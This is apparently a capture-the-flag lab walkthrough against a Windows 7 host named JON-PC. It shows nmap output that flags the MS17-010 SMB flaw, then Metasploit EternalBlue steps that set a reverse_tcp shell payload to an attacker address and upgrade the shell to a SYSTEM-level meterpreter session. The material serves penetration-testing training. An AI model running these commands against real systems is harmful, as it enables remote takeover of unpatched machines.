NSE: Script scanning 10.10.84.104. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:00 NSE Timing: About 99.82% done; ETC: 02:00 (0:00:00 remaining) NSE Timing: About 99.91% done; ETC: 02:01 (0:00:00 remaining) Completed NSE at 02:01, 60.68s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:01 NSE: [ssl-ccs-injection 10.10.84.104:3389] No response from server: ERROR Completed NSE at 02:01, 6.28s elapsed Nmap scan report for 10.10.84.104 Host is up, received reset ttl 127 (0.19s latency). Scanned at 2023-12-29 01:59:05 EST for 138s Not shown: 991 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open tcpwrapped syn-ack ttl 127 |_ssl-ccs-injection: No reply from server (TIMEOUT) 49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49160/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_smb-vuln-ms10-054: false | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:01 Completed NSE at 02:01, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:01 Completed NSE at 02:01, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 172.56 seconds Raw packets sent: 1559 (68.572KB) | Rcvd: 1003 (40.156KB)
Gain Access
1 2 3 4 5 6 7 8 9 10 11 12
msf6 > search ms17-010
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
1 2 3 4
set payload windows/x64/shell/reverse_tcp set rhosts 10.10.84.104 set lhost 10.11.63.201 run
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > use 0
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows Shell Banner: Microsoft Windows [Version 10.11.63.201:4444 -> 10.10.84.104:49182 6.1.7601] ----- (10.10.84.104) 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.11.63.201:4433 -> 10.10.84.104:49193 (10.10.84.104)